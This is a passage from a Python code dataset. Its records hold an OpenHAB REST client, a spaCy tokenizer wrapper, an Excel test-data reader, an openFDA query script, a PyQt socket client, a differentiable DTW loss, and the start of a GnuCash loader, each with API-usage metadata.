327, "usage_type": "name"}, {"api_name": "numpy.fromiter", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 342, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 346, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 346, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.fromiter", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.rint", "line_number": 383, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 475, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 476, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 477, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 482, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 483, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 484, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 487, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 487, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 494, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 495, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 498, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 500, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 501, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 504, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 565, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 566, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 572, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 577, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 577, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 586, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 591, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 596, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 730, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 731, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 731, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 732, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 733, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 734, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 735, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 737, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 756, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 756, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 757, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 759, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 759, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 759, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 761, "usage_type": "call"}]} +{"seq_id": "1144281", "text": "import 
requests\nimport base64\nclass OpenHab:\n\n def __init__(self): \n self.openhab_host = \"localhost\"\n self.openhab_port = \"8080\"\n\n def post_command(self, key, value):\n \"\"\" Post a command to OpenHAB - key is item, value is command \"\"\"\n print(\"post_command called(\" + key + \",\" + value + \")\")\n url = 'http://%s:%s/rest/items/%s'%(self.openhab_host,\n self.openhab_port, key)\n try:\n req = requests.post(url, data=value,\n headers=self.basic_header())\n except requests.ConnectionError:\n print(\"Error addressing the openHab server\")\n\n def put_status(self, key, value):\n \"\"\" Put a status update to OpenHAB key is item, value is state \"\"\"\n url = 'http://%s:%s/rest/items/%s/state'%(self.openhab_host,\n self.openhab_port, key)\n req = requests.put(url, data=value, headers=self.basic_header())\n if req.status_code != requests.codes.ok:\n req.raise_for_status()\n\n def get_status(self, name):\n \"\"\" Request updates for any item in group NAME from OpenHAB.\n Long-polling will not respond until item updates.\n \"\"\"\n # When an item in Group NAME changes we will get all items in the group \n # and need to determine which has changed\n url = 'http://%s:%s/rest/items/%s'%(self.openhab_host,\n self.openhab_port, name)\n payload = {'type': 'json'}\n try:\n req = requests.get(url, params=payload,\n headers=self.polling_header())\n if req.status_code != requests.codes.ok:\n req.raise_for_status()\n # Try to parse JSON response\n # At top level, there is type, name, state, link and members array\n members = req.json()[\"members\"]\n for member in members:\n # Each member has a type, name, state and link\n name = member[\"name\"]\n state = member[\"state\"]\n do_publish = True\n # Pub unless we had key before and it hasn't changed\n if name in self.prev_state_dict:\n if self.prev_state_dict[name] == state:\n do_publish = False\n self.prev_state_dict[name] = state\n if do_publish:\n self.publish(name, state)\n except:\n print(\"error located in openhab.py\")\n\n def basic_header(self):\n \"\"\" Header for OpenHAB REST request - standard \"\"\"\n \"\"\"self.auth = base64.encodestring('%s:%s'\n %(self.username, self.password)\n ).replace('\\n', '')\"\"\"\n return {\n #\"Authorization\" : \"Basic %s\" %self.auth,\n \"Content-type\": \"text/plain\"}\n\n\n", "sub_path": "openhab.py", "file_name": "openhab.py", "file_ext": "py", "file_size_in_byte": 2933, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.post", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.ConnectionError", "line_number": 17, "usage_type": "attribute"}, {"api_name": "requests.put", "line_number": 24, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 25, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 38, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 40, "usage_type": "attribute"}]}
+{"seq_id": "593230159", "text": "\"\"\"\nThe wrapper over spaCy's Tokenizer for `English`,`German`,`Spanish`,`Portuguese`,`French`,`Italian`, and `Dutch`.\n Based on the library's documentation website, the tokenization algorithm can be summarized as follows:\n 1. Iterate over space-separated substrings\n 2. Check whether we have an explicitly defined rule for this substring. If we do, use it.\n 3. Otherwise, try to consume a prefix.\n 4. If we consumed a prefix, go back to the beginning of the loop, so that special-cases always get priority.\n 5. 
If we didn't consume a prefix, try to consume a suffix.\n 6. If we can't consume a prefix or suffix, look for \"infixes\" — stuff like hyphens etc.\n 7. Once we can't consume any more of the string, handle it as a single token.\nFor more info regarding the tokenizer please see the \"Tokenization\" part of https://spacy.io/usage/linguistic-features\nA valid use case of the tokenizer wrapper class could be:\n SpaCyTokenizer().tokenize(\"This is a test\", LanguageIdentifier.en)\n\"\"\"\nfrom typing import List\n\nimport spacy\n\nfrom translate.readers.constants import LanguageIdentifier as LId\n\n__author__ = \"Hassan S. Shavarani\"\n\n\nclass SpaCyTokenizer:\n def __init__(self):\n \"\"\"\n The tokenizer performs lazy instantiation of the models. You don't need multiple instances of this class for\n tokenization of sentences from different languages.\n \"\"\"\n self._models = {}\n self._supported_languages = [LId.en, LId.de, LId.es, LId.pt, LId.fr, LId.it, LId.nl]\n\n def tokenize(self, text: str, lang_identifier: LId, lower_case: bool = False) -> List[str]:\n \"\"\"\n :param text: the string to be tokenized\n :param lang_identifier: one of the langugage values defined in `translate.readers.constants.LanguageIdentifier`\n :param lower_case: the flag indicating whether the resulting tokens need to be lower-cased or not.\n :return: the list of tokenized strings\n \"\"\"\n if lang_identifier not in self._supported_languages:\n raise ValueError(\"SpaCyTokenizer cannot tokenize utterances in \\\"{}\\\"\".format(lang_identifier.name))\n if lang_identifier not in self._models:\n try:\n self._models[lang_identifier] = spacy.load(lang_identifier.name)\n except OSError:\n raise EnvironmentError(\"The spaCy resources for \\\"{0}\\\" might not be installed correctly, please try \"\n \"running the following command in your comman-line before running this project\\n\"\n \"python -m spacy download {0}\".format(lang_identifier.name))\n tokenized_document = self._models[lang_identifier].tokenizer(text)\n if lower_case:\n return [token.text.lower() for token in tokenized_document]\n else:\n return [token.text for token in tokenized_document]\n", "sub_path": "src/translate/readers/tokenizer.py", "file_name": "tokenizer.py", "file_ext": "py", "file_size_in_byte": 2903, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "translate.readers.constants.LanguageIdentifier.en", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier", "line_number": 31, "usage_type": "name"}, {"api_name": "translate.readers.constants.LanguageIdentifier.de", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.es", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.pt", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.fr", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.it", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.nl", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier", "line_number": 33, "usage_type": "name"}, {"api_name": "spacy.load", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 33, "usage_type": "name"}]} +{"seq_id": 
"549646007", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2020/6/3 11:10\n@Author : WangHuan\n@Contact : hi_chengzi@126.com\n@File : data.py\n@Software: PyCharm\n@description: 读取excel中的数据方便testcase直接使用\n\"\"\"\n\nimport os\nimport json\nimport xlrd\n\n\nclass ReadData(object):\n\n def __init__(self, filename):\n scr_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n data_path = os.path.join(scr_path, \"data\", filename)\n data_open = xlrd.open_workbook(data_path)\n self.data_excel = data_open.sheet_by_index(0)\n\n def get_url(self):\n '''\n 获取请求的url\n :return:\n '''\n url = self.data_excel.cell(1, 3).value\n return url\n\n def get_method(self, case_name):\n '''\n 获取请求类型\n :param case_name:\n :return:\n '''\n return self.get_case(case_name=case_name)[4]\n\n def get_data(self, case_name):\n '''\n 获取请求数据,转化为字典格式\n :param case_name:\n :return:\n '''\n return json.loads(self.get_case(case_name)[6])\n\n def get_expect(self, case_name):\n '''\n 期望结果\n :param case_name:\n :return:\n '''\n return self.get_case(case_name)[7]\n\n def get_case(self, case_name):\n '''\n 根据case_name找到对应用例行\n :param case_name:\n :return: 用例所在行\n '''\n\n for i in range(1, self.data_excel.nrows):\n if self.data_excel.cell(i, 1).value == case_name:\n return self.data_excel.row_values(i)\n\n print(\"用例名称未找到\")\n return None\n\n\nif __name__ == '__main__':\n data = ReadData(\"test_login_data.xlsx\")\n url = data.get_url()\n method = data.get_method(\"test_login_normal\")\n json = data.get_data(\"test_login_normal\")\n expect = data.get_expect(\"test_login_normal\")\n print(url, method)\n print(type(json))\n print(json)\n print(expect)\n", "sub_path": "interface/src/common/data.py", "file_name": "data.py", "file_ext": "py", "file_size_in_byte": 2006, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.dirname", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "xlrd.open_workbook", "line_number": 22, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "411078685", "text": "# Importamos los módulos y bibliotecas necesarios para realizar este programa\nimport http.client\nimport json\n\n# Empleamos un código que utiliza la biblioteca http.client que hemos importado para leer repositorios\nheaders = {'User-Agent': 'http-client'}\nconn = http.client.HTTPSConnection(\"api.fda.gov\")\nconn.request(\"GET\", \"/drug/label.json?limit=10\", None, headers) # Con limit=10 encontraremos 10 medicamentos distintos\nr1 = conn.getresponse()\nprint(r1.status, r1.reason)\nrepos_raw = r1.read().decode(\"utf-8\")\nconn.close()\ninformacion = json.loads(repos_raw)\n\n# sabemos que en la página a la que accedemos el contenido es json y json se encuentra en forma de diccionario por tanto utilizamos las funciones de un diccionario para encontrar los diferentes elementos\nmedicamento_info=informacion[\"results\"]\n\n# Indexamos entre los distintos elementos de la página para imprimir los diez que hay en ella\nfor i in range(len(medicamento_info)):\n info = medicamento_info[i]\n print(\"Id del medicamento:\",info[\"id\"])\n", "sub_path": "openfda-1/Programa 2.py", "file_name": "Programa 
2.py", "file_ext": "py", "file_size_in_byte": 1019, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "http.client.client.HTTPSConnection", "line_number": 7, "usage_type": "call"}, {"api_name": "http.client.client", "line_number": 7, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 7, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "152187708", "text": "from PyQt5.QtCore import QThread, pyqtSignal\nimport socket\nimport errno\n\n\nclass ClientThread(QThread):\n oppo = pyqtSignal(str)\n rply = pyqtSignal(str)\n error = pyqtSignal(str)\n rematch = pyqtSignal(str)\n draw = pyqtSignal(str)\n\n def __init__(self, username, ip, parent=None):\n super(ClientThread, self).__init__(parent)\n self.username = username\n self.ip = ip\n\n def run(self):\n rcv = False\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n self.s.connect((self.ip, 1234))\n self.s.sendall(bytes(self.username, 'utf-8'))\n except ConnectionRefusedError as e:\n self.error.emit(\"nTarget Refused to Connect\")\n\n try:\n while True:\n msg = self.s.recv(10)\n msg = msg.decode('utf-8')\n\n if not rcv:\n self.oppo.emit(msg)\n rcv = True\n\n elif msg == \"D\":\n self.draw.emit(msg)\n\n elif msg == \"R\":\n self.rematch.emit(msg)\n\n else:\n self.rply.emit(msg)\n\n except IOError as e:\n if e.errno != errno.EAGAIN and e.errno != errno.EWOULDBLOCK:\n if rcv:\n self.error.emit(\"yOpponent Disconnected\")\n\n except Exception as e:\n self.error.emit('yUnknown Error: {}'.format(str(e)))\n\n def send(self, data):\n self.s.sendall(bytes(data, \"utf-8\"))\n", "sub_path": "Client.py", "file_name": "Client.py", "file_ext": "py", "file_size_in_byte": 1513, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtCore.QThread", "line_number": 6, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 7, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 8, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 9, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 10, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 11, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 20, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 20, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 20, "usage_type": "attribute"}, {"api_name": "errno.EAGAIN", "line_number": 46, "usage_type": "attribute"}, {"api_name": "errno.EWOULDBLOCK", "line_number": 46, "usage_type": "attribute"}]} +{"seq_id": "306234088", "text": "# Macros and libararies\nfrom math import isinf\nfrom numpy import array, zeros, full, argmin, inf, ndim\nimport numpy as np\nimport torch as T\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef _traceback(D):\n i, j = array(D.shape) - 2\n p, q = [i], [j]\n while (i > 0) or (j > 0):\n tb = argmin((D[i, j], D[i, j + 1], D[i + 1, j]))\n if tb == 0:\n i -= 1\n j -= 1\n elif tb == 1:\n i -= 1\n else: # (tb == 2):\n j -= 1\n p.insert(0, i)\n q.insert(0, j)\n return array(p), array(q)\n\ndef dtw(x, y, dist, warp=1, w=inf, s=1.0):\n \"\"\"\n Computes Dynamic Time Warping (DTW) of two sequences.\n :param array x: N1*M array\n :param array y: N2*M array\n :param func dist: distance used as cost measure\n :param int warp: 
how many shifts are computed.\n :param int w: window size limiting the maximal distance between indices of matched entries |i,j|.\n :param float s: weight applied on off-diagonal moves of the path. As s gets larger, the warping path is increasingly biased towards the diagonal\n Returns the minimum distance, the cost matrix, the accumulated cost matrix, and the wrap path.\n \"\"\"\n assert len(x)\n assert len(y)\n assert isinf(w) or (w >= abs(len(x) - len(y)))\n assert s > 0\n r, c = len(x), len(y)\n if not isinf(w):\n D0 = full((r + 1, c + 1), inf)\n for i in range(1, r + 1):\n D0[i, max(1, i - w):min(c + 1, i + w + 1)] = 0\n D0[0, 0] = 0\n else:\n D0 = zeros((r + 1, c + 1))\n D0[0, 1:] = inf\n D0[1:, 0] = inf\n D1 = D0[1:, 1:] # view\n for i in range(r):\n for j in range(c):\n if (isinf(w) or (max(0, i - w) <= j <= min(c, i + w))):\n D1[i, j] = dist(x[i], y[j])\n C = D1.copy()\n jrange = range(c)\n for i in range(r):\n if not isinf(w):\n jrange = range(max(0, i - w), min(c, i + w + 1))\n for j in jrange:\n min_list = [D0[i, j]]\n for k in range(1, warp + 1):\n i_k = min(i+k, r)\n j_k = min(j+k, c)\n min_list += [D0[i_k, j] * s, D0[i, j_k] * s]\n D1[i, j] += min(min_list)\n if len(x) == 1:\n path = zeros(len(y)), range(len(y))\n elif len(y) == 1:\n path = range(len(x)), zeros(len(x))\n else:\n path = _traceback(D0)\n return D1[-1, -1], C, D1, path\n\n\n\n# We define two sequences x, y as numpy array\n# where y is actually a sub-sequence from x\nx = np.array([2, 0, 1, 1, 2, 4, 2, 1, 2, 0]).reshape(-1, 1)\ny = np.array([1, 1, 2, 4, 2, 1, 2, 0]).reshape(-1, 1)\n\n\neuclidean_norm = lambda x, y: np.abs(x - y)\n\nd, cost_matrix, acc_cost_matrix, path = dtw(x, y, dist=euclidean_norm)\n\n\n# You can also visualise the accumulated cost and the shortest path\nimport matplotlib.pyplot as plt\n\nplt.imshow(acc_cost_matrix.T, origin='lower', cmap='gray', interpolation='nearest')\nplt.plot(path[0], path[1], 'w')\n#plt.show()\n\n\n\n\n# this cannot handle inf, -\\rho * x too big, e^{- \\rho * x} close to 0\ndef smooth_min(x, rho=10):\n eps = 1e-12\n val = -1/rho * T.log(T.mean(T.exp(x * (-rho))) + eps)\n assert val!=float('inf'), T.mean(T.exp(x * (-rho)))\n return val\n\nrho = 10\nx = T.tensor([100.0, 2.0231, 100.0])\nprint (smooth_min(x,rho))\n\n\n# 1d min func is 1\n\n\n# this will serve as a loss function\ndef _traceback(D):\n i, j = array(D.shape) - 2\n p, q = [i], [j]\n while (i > 0) or (j > 0):\n tb = argmin((D[i, j], D[i, j + 1], D[i + 1, j]))\n if tb == 0:\n i -= 1\n j -= 1\n elif tb == 1:\n i -= 1\n else: # (tb == 2):\n j -= 1\n p.insert(0, i)\n q.insert(0, j)\n return array(p), array(q)\n\n\ndef diff_dtw_loss(x, y, dist, warp=1, w=inf, s=1.0, rho=40):\n \"\"\" differentiable dtw, takes two sequences and\n compute the distance under the metric\n x, y is a tensor seq_len x dim\n dist is a bi-variate function\n \"\"\"\n\n assert x.shape[0]\n assert y.shape[0]\n assert isinf(w) or (w >= abs(len(x) - len(y)))\n assert s > 0\n\n MAX_VAL = 1e2\n\n r, c = x.shape[0], y.shape[0]\n if not isinf(w):\n D0 = T.full((r + 1, c + 1), MAX_VAL)\n for i in range(1, r + 1):\n D0[i, max(1, i - w):min(c + 1, i + w + 1)] = 0\n D0[0, 0] = 0\n else:\n D0 = T.zeros(r + 1, c + 1)\n D0[0, 1:] = MAX_VAL\n D0[1:, 0] = MAX_VAL\n D1 = D0[1:, 1:] # view\n for i in range(r):\n for j in range(c):\n #print(\"dtw size\", x.size(), y.size())\n if (isinf(w) or (max(0, i - w) <= j <= min(c, i + w))):\n D1[i, j] = dist(x[0][i], y[0][j])\n C = D1.clone()\n jrange = range(c)\n for i in range(r):\n if not isinf(w):\n jrange = 
range(max(0, i - w), min(c, i + w + 1))\n for j in jrange:\n min_list = D0[i, j]\n for k in range(1, warp + 1):\n # print(i+k, r)\n i_k = min(i + k, r)\n j_k = min(j + k, c)\n min_list = T.cat((T.tensor([min_list], requires_grad=True), \\\n T.tensor([D0[i_k, j] * s], requires_grad=True), \\\n T.tensor([D0[i, j_k] * s], requires_grad=True)))\n # Softmin is NOT a smooth min function\n min_val = smooth_min(min_list, rho)\n # print('min:', i, j, min_val, min_list)\n D1[i, j] = D1[i, j] + min_val\n if len(x) == 1:\n path = zeros(len(y)), range(len(y))\n elif len(y) == 1:\n path = range(len(x)), zeros(len(x))\n else:\n path = _traceback(D0)\n return D1[-1, -1], C, D1, path\n\n\n\nx = np.array([2, 0, 1, 1, 2, 4, 2, 1, 2, 0], dtype=np.float32).reshape(-1, 1)\ny = np.array([1, 1, 2, 4, 2, 1, 2, 0], dtype=np.float32).reshape(-1, 1)\n\n\ntensor_x = T.tensor(T.from_numpy(x), requires_grad=True)\ntensor_y = T.tensor(T.from_numpy(y), requires_grad=True)\n\n\neuclidean_norm = lambda x, y: T.abs(x - y)\n\n#diff_d, diff_cost_matrix, diff_acc_cost_matrix, diff_path = diff_dtw_loss(tensor_x, tensor_y, dist=euclidean_norm)\n\n#print('distance', diff_d, 'diff distance:', diff_d.detach().numpy())\n#diff_acc_cost_matrix = diff_acc_cost_matrix.detach().numpy()\n# print(acc_cost_matrix)\n\n\n# You can also visualise the accumulated cost and the shortest path\nimport matplotlib.pyplot as plt\n\n#fig, (ax1, ax2) = plt.subplots(1, 2)\n#fig.suptitle('Original and Differentiable Accumated Cost Matrix')\n#ax1.imshow(acc_cost_matrix.T, origin='lower', cmap='gray', interpolation='nearest')\n#ax1.plot(path[0], path[1], 'w')\n#ax2.imshow(diff_acc_cost_matrix.T, origin='lower', cmap='gray', interpolation='nearest')\n#ax2.plot(diff_path[0], diff_path[1], 'w')\n\n\n# plt.imshow(acc_cost_matrix.T, origin='lower', cmap='gray', interpolation='nearest')\n# plt.plot(path[0], path[1], 'w')\n# plt.show()\n\n\nimport torch as T\nfrom torch.nn import functional as F\n\nfrom torch.nn.modules import Module\n\nclass _Loss(Module):\n def __init__(self, size_average=None, reduce=None, reduction='mean', _Reduction=None):\n super(_Loss, self).__init__()\n if size_average is not None or reduce is not None:\n self.reduction = _Reduction.legacy_get_string(size_average, reduce)\n else:\n self.reduction = reduction\n\n\nclass DTW_Loss(_Loss):\n def __init__(self, rho=10, size_average=None, reduce=None, reduction='mean'):\n super(DTW_Loss, self).__init__(size_average, reduce, reduction)\n self.rho = rho\n\n def forward(self, output, target):\n # batch x seq_len x dim\n if ndim(output)==3:\n dist = []\n for b in range(output.size(0)):\n #print(\"sizes\", output.size(), target.size())\n d_b, cost_matrix, diff_acc_cost_matrix, diff_path = diff_dtw_loss(output[b], target[b], dist=euclidean_norm, rho=rho)\n dist.append(d_b)\n d = T.mean(T.stack(dist))\n else:\n d, cost_matrix, diff_acc_cost_matrix, diff_path = diff_dtw_loss(output, target, dist=euclidean_norm, rho=rho)\n #F.mse_loss(output, target, reduction=self.reduction)\n loss_val = d #.detach().numpy()\n return loss_val\n\nx = np.array([2, 0, 1, 1, 2, 4, 2, 1, 2, 0], dtype=np.float32).reshape(1, -1, 1)\ny = np.array([1, 1, 2, 4, 2, 1, 2, 0], dtype=np.float32).reshape(1, -1, 1)\n\ntensor_x = T.tensor(T.from_numpy(x),requires_grad=True)\ntensor_y = T.tensor(T.from_numpy(y),requires_grad=True)\nloss_vals = []\n\nrhos = np.linspace(1, 10,10)\n#for rho in rhos:\n #print(rho)\n #my_loss = DTW_Loss(rho)\n #loss_vals.append(my_loss(tensor_x, tensor_y))\n", "sub_path": "Peg In Hole 
HDR-IL/differentiableDP.py", "file_name": "differentiableDP.py", "file_ext": "py", "file_size_in_byte": 8531, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 26, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 39, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 43, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 50, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 54, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.log", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 132, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 141, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 147, "usage_type": "call"}, {"api_name": "torch.full", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 153, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 160, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 190, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 191, "usage_type": 
"call"}, {"api_name": "numpy.float32", "line_number": 191, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 198, "usage_type": "call"}, {"api_name": "torch.nn.modules.Module", "line_number": 228, "usage_type": "name"}, {"api_name": "numpy.ndim", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 250, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 257, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 258, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 264, "usage_type": "call"}]} +{"seq_id": "548821273", "text": "import cPickle\nimport gzip\nimport os.path\nimport sys\nfrom subprocess import PIPE, Popen\nfrom warnings import warn\n\nimport yaml\n\nfrom koert.gnucash.xmlformat import SaxHandler\n\n\ndef open_gcf_in_git_repo(repopath, filepath, cachepath=None, scheme=None):\n from git import Repo\n\n repo = Repo(repopath)\n commit = repo.head.commit\n mtime = commit.authored_date\n f = commit.tree[filepath].data_stream\n\n result = parse_gcf(f, mtime, cachepath=cachepath, scheme=scheme)\n\n f.read()\n\n return result\n\n\ndef open_pos_gzipped(filepath):\n f = None\n try:\n # Only after a byte is read, is the check whether filepath\n # points to a gzipped file performed.\n f = gzip.open(filepath)\n f.read(1)\n f.rewind()\n except IOError:\n # message should read: \"Not a gzipped file\"\n f = open(filepath)\n return f\n\n\ndef saxparse(f, handler):\n from xml.sax import parse as saxparse\n saxparse(f, handler)\n\n\ndef lxmlparse(f, handler):\n from lxml.etree import parse as lxmlparse\n from lxml.sax import saxify\n etree = lxmlparse(f)\n saxify(etree, handler)\n\n\ndef cache_path(filepath):\n return filepath + \".pickled\"\n\n\ndef get_commit_name():\n directory = os.path.dirname(__file__)\n p = Popen('git rev-parse HEAD',\n stdout=PIPE, shell=True, cwd=directory)\n outp, err = p.communicate()\n return outp\n\n\ndef 